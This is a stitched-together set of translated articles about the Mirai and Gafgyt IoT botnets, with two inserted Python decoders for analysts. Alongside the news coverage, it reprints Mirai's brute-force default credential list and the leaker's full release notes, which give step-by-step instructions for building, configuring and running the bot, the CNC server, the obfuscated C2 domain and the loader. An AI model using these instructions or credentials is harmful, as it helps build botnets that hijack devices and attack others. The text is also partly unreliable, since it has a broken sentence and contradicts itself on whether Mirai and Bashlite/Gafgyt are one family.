The source code of the Mirai Trojan, on which a powerful IoT botnet was built, has been published. Botnets: how they work and how money is made from them using the Mirai source code

The two most famous and widespread IoT botnets, Mirai and Gafgyt, continue to multiply. New variants of this malware have been found that target the corporate sector. The main danger of these threats is well-organized and sufficiently powerful DDoS attacks.

The reason for the prevalence of these two malware families lies in the leak of their source code, which became publicly available several years ago. Novice cybercriminals immediately began building their own malicious programs on it.

In most cases, owing to the attackers' incompetence, the Mirai and Gafgyt clones were not serious projects and brought no significant changes in capability.

However, the latest botnet variants show a tendency to infect corporate devices. A report by Palo Alto Networks' Unit 42 team says that new Mirai and Gafgyt samples have added a number of new exploits to their arsenal, targeting old vulnerabilities.

Mirai now attacks systems running unpatched Apache Struts (this is how a well-known hack took place last year). A patch for CVE-2017-5638 has existed for more than a year, but, naturally, not everyone has updated their installation.

In total, Mirai currently carries 16 exploits, most of which are designed to compromise devices such as routers, network video recorders and various cameras.

Gafgyt (also known as Bashlite) also attacks business equipment, focusing on the recently discovered vulnerability CVE-2018-9866. This critical security flaw affects an unsupported version of SonicWall's Global Management System (GMS). Unit 42 researchers recorded new samples on August 5, less than a week after the publication of a Metasploit module for this vulnerability.

Devices infected by Gafgyt can scan other equipment for various kinds of security problems and attack them with known exploits. Another attack type this malware can perform is BlackNurse, an ICMP attack that heavily loads the CPU and leads to denial of service.

The experts also found that these two new botnets were hosted on the same domain. This indicates that the same cybercriminal or group is behind both of them.

At the end of last month we reported that. These figures come from the Global Threat Index report for July 2018.

And this month, law enforcement identified the person behind one of the most famous Mirai successors, Satori. It turned out that the cybercriminal has now been charged.

The Mirai botnet's attacks on the American DNS provider Dyn in 2016 caused a wide stir and drew increased attention to botnets. However, compared with how modern cybercriminals use botnets today, the attacks on Dyn may seem like child's play. Criminals quickly learned to use botnets to deploy complex malware, allowing them to build entire infrastructures out of infected computers and other Internet-connected devices in order to make illegal profits on a huge scale.

In recent years, law enforcement agencies have achieved certain successes in the fight against criminal activity involving botnets, but so far these efforts are, of course, not enough to make a sufficient dent in the botnets under cybercriminal control. Here are some well-known examples:

  • The US Department of Justice charged two young people for their role in developing and operating the Mirai botnet: 21-year-old Paras Jha and 20-year-old Josiah White. They are accused of organizing and conducting DDoS attacks on companies, then demanding a ransom to stop them, as well as selling these companies "services" to prevent such attacks in the future.
  • The Spanish authorities, in a cross-border operation at the request of the United States, arrested St. Petersburg resident Peter Levashov, known in cybercrime circles as Peter Severa. He ran Kelihos, one of the longest-lived botnets, estimated to have infected about 100 thousand computers. Besides extortion, Levashov actively used Kelihos for spam mailings, charging $200-$500 per million messages.
  • Last year, two Israeli teenagers were arrested on charges of organizing DDoS attacks for payment. The pair managed to earn about $600 thousand and carry out about 150 thousand DDoS attacks.

Botnets are networks consisting of a large number of Internet-connected computers or other devices on which autonomous software, bots, has been downloaded and launched without the knowledge of their owners. Interestingly, the first bots were developed as software tools for automating non-criminal, monotonous and repetitive tasks. Ironically, one of the first successful bots, known as Eggdrop and created in 1993, was designed to manage IRC (Internet Relay Chat) channels and protect them from third-party attempts to seize control of them. But criminal elements quickly learned to harness the power of botnets, using them as global, practically automatic income systems.

Since then, botnet malware has developed significantly and can now employ various attack methods simultaneously in several directions. In addition, "botonomics", from the cybercriminals' point of view, looks extremely attractive. First of all, there are practically no infrastructure costs, since the network is built from infected machines and other Internet-connected equipment, naturally without the knowledge of the owners of these devices. This freedom from infrastructure investment means the criminals' profit practically equals their income from illegal activity. Besides using such a "profitable" infrastructure, anonymity is also extremely important to cybercriminals; for ransom demands they mainly use "unmonitored" cryptocurrency such as Bitcoin. For these reasons, botnets have become the preferred cybercriminal platform.

From the point of view of implementing various business models, botnets are an excellent platform for launching diverse malicious functionality that brings cybercriminals illegal income:

  • Fast, large-scale distribution of emails carrying ransomware.
  • A platform for click fraud (inflating the number of clicks on links).
  • Opening proxy servers for anonymous Internet access.
  • Attempts to break into other Internet systems by brute force.
  • Mass mailing of emails and hosting of fake sites for large-scale phishing.
  • Theft of CD keys or other software licensing data.
  • Theft of personally identifiable information.
  • Obtaining credit card data and other bank account information, including PIN codes or "secret" passwords.
  • Installing keyloggers to capture everything the user types into the system.

How to create a botnet?

An important factor in the popularity of botnets among today's cybercriminals is the relative ease with which the various components of botnet malware can be assembled, modified and improved. The ability to quickly create a botnet appeared in 2015, when the source code of the original LizardStresser, a DDoS tool created by the notorious hacker group Lizard Squad, became publicly available. Today any schoolboy can download a botnet for DDoS attacks (which they are already doing, as news reports worldwide show).

The easy-to-download and easy-to-use LizardStresser code contains some sophisticated methods for carrying out DDoS attacks: holding TCP connections open, sending random strings of junk characters to a TCP or UDP port, or repeatedly sending TCP packets with specified flag values. The malware also included a mechanism for arbitrary execution of shell commands, which is extremely useful for downloading updated versions of LizardStresser with new commands and an updated list of controlled devices, as well as for installing other malware on the infected device. Since then, the source code of other malware for organizing and controlling botnets has been published, first and foremost Mirai, which dramatically lowered the "high-tech barrier" to starting criminal activity and at the same time increased the profit opportunities and the flexibility of botnet use.

How the Internet of Things (IoT) became a Klondike for building botnets

From the point of view of the number of infected devices and the traffic generated during attacks, the mass use of unprotected IoT devices had an explosive effect, leading to the appearance of botnets of unprecedented size. For example, in the summer of 2016, before and during the Olympic Games in Rio de Janeiro, one botnet built on the LizardStresser code used mainly about 10 thousand infected IoT devices (first of all webcams) to carry out numerous and long-lasting DDoS attacks with a steady power of more than 400 Gb/s, peaking at 540 Gb/s. We also note that, by some estimates, the original Mirai botnet managed to compromise about 500 thousand IoT devices around the world.

Although many manufacturers made some changes after such attacks, IoT devices are mostly still shipped with factory-default usernames and passwords or well-known security vulnerabilities. In addition, to save time and money, some manufacturers periodically reuse hardware and software across different classes of devices. As a result, the default passwords used to control the original device can be applied to many completely different devices. Thus, billions of unprotected IoT devices are already deployed. And although the predicted growth in their number has slowed (if only slightly), the expected increase in the global fleet of "potentially dangerous" IoT devices in the foreseeable future cannot fail to shock (see the chart below).

Many IoT devices are perfectly suited to unauthorized use in criminal botnets because:

  • For the most part they are unmanaged, that is, they run without proper oversight by a system administrator, which makes them extremely effective as anonymous proxies.
  • They are usually online 24x7, which means they are available for attacks at any time, and, as a rule, without any bandwidth limit or traffic filtering.
  • They often run a stripped-down operating system based on the Linux family, and botnet malware can easily be compiled for the widely used architectures, mainly ARM/MIPS/x86.
  • A stripped-down operating system automatically means fewer opportunities to implement security functions, including logging, so most threats go unnoticed by the owners of these devices.

Here is another recent example that helps to grasp the power that modern criminal botnet infrastructures can have: in November 2017, the Necurs botnet distributed a new strain of the Scarab ransomware. In this mass campaign about 12.5 million infected emails were sent, a distribution rate of more than 2 million letters per hour. Incidentally, the same botnet has been seen distributing the Dridex and Trickbot banking Trojans, as well as the Locky and Jaff ransomware.

Conclusions

The favourable situation for cybercriminals in recent years, combining the high availability and ease of use of ever more complex and flexible botnet malware with a significant increase in the number of unprotected IoT devices, has made criminal botnets a core component of the growing digital underground economy. In this economy there are markets for selling illegally obtained data, for carrying out malicious actions against specific targets as a service, and even for its own currency. And all the forecasts of analysts and security specialists sound extremely discouraging: in the foreseeable future, the unlawful use of botnets for illegal profit will only get worse.

Eternal paranoid, Anton Kochekov.


See also:

Last week, the source code of the Mirai botnet components, used in attacks of up to 1 Tb/s, was published.

Article 273 of the Criminal Code of the Russian Federation. Creation, use and dissemination of malicious computer programs

1. Creation, distribution or use of computer programs or other computer information knowingly intended for the unauthorized destruction, blocking, modification or copying of computer information, or for neutralizing means of protecting computer information, -

shall be punished by restriction of liberty for up to four years, or compulsory labour for up to four years, or imprisonment for the same term with a fine of up to two hundred thousand rubles or in the amount of the convict's wages or other income for a period of up to eighteen months.

2. Acts provided for in part one of this Article, committed by a group of persons by prior conspiracy or by an organized group, or by a person using their official position, or causing major damage or committed out of self-interest, -

shall be punished by restriction of liberty for up to four years, or compulsory labour for up to five years with or without deprivation of the right to hold certain positions or engage in certain activities for up to three years, or imprisonment for up to five years with a fine of one hundred thousand to two hundred thousand rubles or in the amount of the convict's wages or other income for a period of two to three years or without such, and with or without deprivation of the right to hold certain positions or engage in certain activities for up to three years.

3. Acts provided for in parts one or two of this Article, if they entailed grave consequences or created a threat of their occurrence, -

shall be punished by imprisonment for up to seven years.

This botnet consists mainly of cameras, DVR devices and the like.

Infection is quite simple: the Internet is scanned for open ports 80/23 (web/Telnet), and hard-coded accounts are tried.

Few users change the passwords of built-in accounts (where that is even possible), so the botnet is continuously replenished with new devices. Even where the password can be changed from the web interface, the Telnet password, and the very existence of Telnet access, simply escapes many users' attention.

The most commonly used accounts are the following (username:password):

enable:system
shell:sh
admin:admin
root:XC3511
root:vizxv
root:admin
root:xmhdipc
root:123456
root:888888
support:support
root:54321
root:juantech
root:anko
root:12345
admin:(empty password)
root:default
admin:password
root:root
root:(empty password)
user:user
admin:smcadmin
root:pass
admin:admin1234
root:1111
guest:12345
root:1234
root:password
root:666666
admin:1111
service:service
root:system
supervisor:supervisor
root:klv1234
administrator:1234
root:IKWB
root:ZTE521

After access is obtained, the command center receives a binary notification of the new bot:

4a 9a d1 d1 = xxx.xxx.xxx.xxx (the host address was here)
05 = tab
17 = 23 (port 23, Telnet)
05 = tab
61 64 6d 69 6e = username: admin
05 = tab
61 64 6d 69 6e = password: admin
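For anyone writing a network detection for this report, the following decoder is an added example written for this page, not code from the article. It assumes the layout used by the published Mirai scanner.c/scanListen.go (which the article does not spell out): one zero byte, a 4-byte IPv4 address, a 2-byte big-endian port, then two length-prefixed strings; under that layout the 0x05 bytes the article labels "tab" are the length prefixes of the five-character "admin". The sample payload is constructed.

```python
"""Parse the "new bot" report a Mirai scanner sends after a successful Telnet login.

Added example for this page. Layout assumed (from the public scanner.c /
scanListen.go, not stated in the article): 0x00, IPv4 (4 bytes), port
(uint16, network order), len + username, len + password.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class BotReport:
    victim_ip: str
    victim_port: int
    username: str
    password: str

    def as_summary(self) -> str:
        """Same shape as the loader input format quoted on this page: ip:port user:pass."""
        return f"{self.victim_ip}:{self.victim_port} {self.username}:{self.password}"


class ReportError(ValueError):
    """Raised when the byte stream does not match the expected layout."""


def parse_report(data: bytes) -> tuple[BotReport, int]:
    """Decode one report from the start of `data`; return it and the bytes consumed.

    Strict by design: a detector should reject malformed input rather than
    guess, so truncation and a non-zero leading byte both raise ReportError.
    """
    if len(data) < 1 + 4 + 2 + 1:
        raise ReportError("truncated header")
    if data[0] != 0:
        raise ReportError(f"unexpected leading byte {data[0]:#04x}")
    ip = ".".join(str(b) for b in data[1:5])
    (port,) = struct.unpack("!H", data[5:7])
    pos = 7
    fields = []
    for _ in range(2):  # username, then password
        if pos >= len(data):
            raise ReportError("truncated length byte")
        length = data[pos]
        pos += 1
        if pos + length > len(data):
            raise ReportError("truncated string")
        fields.append(data[pos:pos + length].decode("latin-1"))
        pos += length
    return BotReport(ip, port, fields[0], fields[1]), pos


def parse_stream(data: bytes) -> list[BotReport]:
    """Split a captured TCP payload holding back-to-back reports."""
    reports = []
    pos = 0
    while pos < len(data):
        report, used = parse_report(data[pos:])
        reports.append(report)
        pos += used
    return reports


# Constructed sample (documentation IP ranges): two reports in one payload,
# 198.51.100.7:23 admin:admin and 203.0.113.9:2323 root:xc3511.
SAMPLE_PAYLOAD = (
    b"\x00" + bytes([198, 51, 100, 7]) + struct.pack("!H", 23)
    + b"\x05admin" + b"\x05admin"
    + b"\x00" + bytes([203, 0, 113, 9]) + struct.pack("!H", 2323)
    + b"\x04root" + b"\x06xc3511"
)

if __name__ == "__main__":
    for r in parse_stream(SAMPLE_PAYLOAD):
        print(r.as_summary())
```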

The botnet components are built for different environments, as the identified samples show:

mirai.arm
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4

Command servers are currently hosted at the following addresses:


The instructions for creating the botnet are quite simple; we reproduce them AS IS (source http://pastebin.com/e90i6ybb):

Greetz everybody,

When I first go in DDoS industry, I wasn't planning on staying in it long. I made my money, there's lots of eyes looking at IoT now, so it's time to GTFO. However, I know every skid and their mama, it's their wet dream to have something besides qbot.

So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

So, I am your senpai, and I will treat you real nice, my hf-chan.

And to everyone hitting my CNC, I had well laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol

Also, shoutout to this blog post by malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/201060930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html <- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. "We still have better kung fu than me" laugh please, you made so many mistakes and even confused some different binaries with my. LOL.

Let me give you some slaps back -
1) Port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together
2) /dev/watchdog and /dev/misc are not for "making the delay", it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb
3) You failed and thought fake_cnc_addr and fake_cnc_port was real CNC, LOL "and doing the backdoor to connect via HTTP on 65.222.202.53". You got tripped up by signal flow ;) Try harder skiddo
4) Your skeleton tool sucks ass, it thought the attack decoder was "sinden style", but it does not even use a text-based protocol? CNC and bot communicate over binary protocol
5) You say 'chroot("/") so predictable like torlus' but you don't understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you're "beat me" with your dumb kung-fu statement made me laugh so hard while eating my so had to pat me on the back.

Just as I forever be free, you will be doomed to mediocrity forever.

Requirements
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

Op requirements
2 VPS and 4 servers
- 1 VPS with extremely bulletproof host for database server
- 1 VPS, rootkitted, for scanReceiver and distributor
- 1 server for CNC (used 2% CPU with 400k bots)
- 3x 10Gbps NForce servers for loading (distributor distributes to 3 servers equally)

- To establish connection to CNC, bots resolve a domain (resolv.c / resolv.h) and connect to that IP address
- Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
- Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utility scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

The loader can be configured to use multiple IP address to bypass port exhaustion in Linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.
Bot has several configuration options that are obfuscated in (table.c / table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

- TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards :)
- TABLE_CNC_PORT - Port to connect to, its set to 23 already
- TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to
- TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.

In ./mirai/tools you will find something called enc.c - you must compile this to output things to put in the table.c file

Run this inside mirai directory

./build.sh debug telnet

You will get some errors related to cross-compilers not being there if you haven't configured them. This is OK, won't affect compiling the enc tool

Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:

./debug/enc string fuck.the.police.com
The output should look like this

XOR'ing 20 bytes of data...
\x44\x57\x41\x49\x0c\x56\x4a\x47\x0c\x52\x4d\x4e\x4b\x41\x47\x0c\x41\x4d\x4f\x22
To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR'ing 20 bytes of data". This value must replace the last argument as well. So for example, the table.c line originally looks like this
add_entry(TABLE_CNC_DOMAIN, "\x41\x4c\x41\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22", 30); // cnc.changeme.com
Now that we know value from enc tool, we update it like this

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0c\x56\x4a\x47\x0c\x52\x4d\x4e\x4b\x41\x47\x0c\x41\x4d\x4f\x22", 20); // fuck.the.police.com
Some are port (uint16 in network order / big endian).
Configure the CNC:
apt-get install mysql-server mysql-client

CNC requires database to work. When you install database, go into it and run following commands:
http://pastebin.com/86d0il9g

This will create database for you. To add your user,

INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, 0, 0, -1, 1, 30, '');
Now, go into file ./mirai/cnc/main.go

Edit these values
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"
To the information for the MySQL server you just installed

Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.

http://pastebin.com/1rcc3ad
The CNC, bot, and related tools:
http://dopefile.pk/a9f2n9ewk8om
How to build bot + CNC
In mirai folder, there is build.sh script.
./build.sh debug telnet

Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder
./build.sh release telnet

Will output production binaries of bot that are extremely stripped, small (about 60k) that should be loaded onto devices. Compiles all binaries in format: mirai.$ARCH to ./mirai/release folder

Loader reads telnet entries from stdin in following format:
ip:port user:pass
It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget.
./build.sh

Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this
cat file.txt | ./loader
Remember to ulimit!

Just so it's clear, I'm not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like "my bot not connect, fix it"
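The table.c obfuscation described in the release notes above is what an analyst has to undo to pull the C2 domain and report port out of a Mirai sample's configuration. The decoder below is an added example written for this page (not code from the article or from the Mirai source tree); it assumes the XOR scheme and the 0xdeadbeef key of the published table.c, treats *_PORT entries as big-endian uint16 as the notes say, and the two port lines in its sample are constructed here, while the domain line is the one quoted in the notes.

```python
"""Recover configuration values from Mirai-style table.c entries.

Added example for this page. Assumed (from the public table.c, not stated
in the article): every byte is XORed with each of the four bytes of a
32-bit key in turn, which collapses to one single-byte mask.
"""
from __future__ import annotations

import re

# Key from the released table.c (`table_key = 0xdeadbeef`, an assumption
# about the source tree).  Applying k1..k4 to each byte equals one XOR mask.
DEFAULT_TABLE_KEY = 0xDEADBEEF

# Matches: add_entry(NAME, "<c string literal>", LEN)
ADD_ENTRY_RE = re.compile(
    r'add_entry\s*\(\s*(\w+)\s*,\s*"((?:\\x[0-9A-Fa-f]{2}|[^"\\])*)"\s*,\s*(\d+)\s*\)'
)


def effective_mask(key: int) -> int:
    """Collapse the four-bytes-in-turn XOR into the single byte it amounts to."""
    k1, k2, k3, k4 = key & 0xFF, (key >> 8) & 0xFF, (key >> 16) & 0xFF, (key >> 24) & 0xFF
    return k1 ^ k2 ^ k3 ^ k4


def parse_c_escapes(literal: str) -> bytes:
    r"""Turn the body of a C string literal such as \x41\x4c... into raw bytes."""
    out = bytearray()
    for hexpair, char in re.findall(r"\\x([0-9A-Fa-f]{2})|(.)", literal, re.S):
        out.append(int(hexpair, 16) if hexpair else ord(char))
    return bytes(out)


def deobfuscate(blob: bytes, key: int = DEFAULT_TABLE_KEY) -> bytes:
    """Undo the table.c transform; the caller decides how to interpret the bytes."""
    mask = effective_mask(key)
    return bytes(b ^ mask for b in blob)


def decode_entry(name: str, blob: bytes, key: int = DEFAULT_TABLE_KEY) -> str | int:
    """Strings are NUL-terminated ASCII; *_PORT entries hold a big-endian uint16."""
    plain = deobfuscate(blob, key)
    if name.endswith("_PORT"):
        return int.from_bytes(plain[:2], "big")
    return plain.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def decode_table_source(source: str, key: int = DEFAULT_TABLE_KEY) -> list[dict]:
    """Decode every add_entry(...) call found in table.c-style text.

    The declared length is compared with the literal because the release
    notes quoted above contain a line whose length argument (30) does not
    match its 17-byte string.
    """
    entries = []
    for name, literal, declared in ADD_ENTRY_RE.findall(source):
        blob = parse_c_escapes(literal)
        entries.append({
            "name": name,
            "value": decode_entry(name, blob, key),
            "declared_len": int(declared),
            "actual_len": len(blob),
            "length_ok": int(declared) == len(blob),
        })
    return entries


# Constructed sample: the original TABLE_CNC_DOMAIN line quoted in the release
# notes, plus two port lines built here for the default ports 23 and 48101.
SAMPLE_TABLE_C = r'''
add_entry(TABLE_CNC_DOMAIN, "\x41\x4c\x41\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22", 30);
add_entry(TABLE_CNC_PORT, "\x22\x35", 2);
add_entry(TABLE_SCAN_CB_PORT, "\x99\xc7", 2);
'''

if __name__ == "__main__":
    for e in decode_table_source(SAMPLE_TABLE_C):
        flag = "" if e["length_ok"] else "  <- declared length does not match literal"
        print(f'{e["name"]}: {e["value"]!r} ({e["actual_len"]} bytes, declared {e["declared_len"]}){flag}')
```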

In mid-September 2016, the well-known journalist Brian Krebs once again angered the hacker underground, after which his site was hit by a DDoS attack whose peak power reached 620 Gb/s. As Krebs and representatives of Akamai, which for several years had provided the journalist with protection and hosting completely free of charge, reported, the attack was carried out using GRE (Generic Routing Encapsulation) packets, which is very unusual. Specialists also reported that most of the junk traffic was generated by various IoT devices: routers, IP cameras, DVRs and so on.

Now Brian Krebs reports that the author of the malware with which this botnet was built has published the source code of his Trojan on the Hack Forums portal. This Trojan is known by various names (Bashlite, Gafgyt, Lizkebab, Torlus, Bash0day and Bashdoor), but most often it is called Mirai.

The malware's author hides under the alias Anna-senpai. In a message published on Hack Forums, he took responsibility for the attacks on Brian Krebs' website and said that he had never planned to engage in DDoS attacks for long. Now that the attacks on Krebs have drawn a lot of attention to the botnet and the number of bots has begun to decline, Anna-senpai decided it was time to make a gift to all the script kiddies and publish the Trojan's source code so that they would have at least some alternative to qbot.


The Mirai sources

Brian Krebs writes that Mirai is an updated version of the well-known DDoS malware Bashlite, which, according to Level3 Communications, has already infected on the order of a million IoT devices. The journalist calls the publication of the source code a very reasonable move on the attackers' part.

"Attackers who develop malware often publicly disclose the source code when law enforcement agencies and security companies start sniffing too close to home. Publishing the code online, where anyone can see and download it, guarantees that the author is not the only one who has the source, in case the authorities come for him," writes Krebs.

It seems that very soon the number of infected IoT devices will increase by an order of magnitude, and users will begin to complain about slower Internet speeds as IoT devices saturate the entire channel with their activity, Krebs predicts. MalwareTech specialists agree with him, gloomily joking about socialism in the botnet field.

Powerful DDoS attacks do not let us forget the danger of embedded devices reachable from the Internet. One such incident was the attack on the website of the well-known blogger and security researcher Brian Krebs, which peaked at 620 Gbit/s.

At the end of last week, the problem posed by the huge army of exposed devices was aggravated: the source code of the Mirai malware that generated this powerful traffic was published on the Hackforums website.

"The news is not the phenomenon itself, but the attackers' awareness of a huge army of devices on the network with configuration flaws, such as default credentials that are easy to exploit," says Roland Dobbins, lead engineer at Arbor Networks. "In fact, in terms of bandwidth, they are more effective than general-purpose computers, as they are not burdened with a user interface and are usually not heavily loaded."

In addition, a smart device is always on, and network administrators, according to Dobbins, rarely react to excessive activity coming from such devices. "They usually run unsupervised and are deployed in networks whose operators do not pay attention to incoming and outgoing traffic," the expert complains. "Moreover, there are a great many such devices. The attackers know perfectly well that they can make a botnet for conducting powerful attacks."

Mirai is especially dangerous in that it constantly scans the Internet for default and hard-coded credentials. The best protection against such malware is to change the credentials, since a simple reboot can lead to re-infection, as Krebs rightly said.

"Attacks of this type have already replaced [traditional DDoS]," Dobbins states. "IoT botnets are by no means a coming threat. I am not worried about the future, but about the past. If I had a magic wand, I would make all these unreliable devices disappear. In the meantime, we still have a big problem: there are still tens of millions of such devices on the Internet."